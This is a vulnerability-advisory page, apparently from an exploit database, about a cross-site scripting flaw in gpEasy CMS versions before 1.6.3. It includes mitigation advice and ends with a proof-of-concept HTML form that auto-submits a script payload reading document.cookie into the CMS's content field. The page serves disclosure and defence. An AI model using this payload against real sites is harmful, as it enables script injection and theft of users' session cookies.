header-logo
Suggest Exploit
vendor:
gpEasy CMS
by:
Unknown
7.5
CVSS
HIGH
Cross-Site Scripting
79
CWE
Product Name: gpEasy CMS
Affected Version From: Versions prior to gpEasy CMS 1.6.3
Affected Version To: Not applicable
Patch Exists: YES
Related CWE: Not available
CPE: Not available
Metasploit:
Other Scripts:
Platforms Tested: Unknown
Unknown

Cross-Site Scripting in gpEasy CMS

The gpEasy CMS is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

Mitigation:

Update to gpEasy CMS version 1.6.3 or later to fix this issue. Ensure that user-supplied input is properly sanitized and validated to prevent XSS attacks.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/40330/info

gpEasy CMS is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

Versions prior to gpEasy CMS 1.6.3 are vulnerable 

<form method="POST" action="http://example.com/index.php/Home" name="myfrm">
<input type="hidden" name="cmd" value=&#039;save&#039;>
<input type="hidden" name="gpcontent" value=&#039;text"><script>alert(document.cookie)</script>&#039;>
</form>
<script>
document.myfrm.submit();
</script>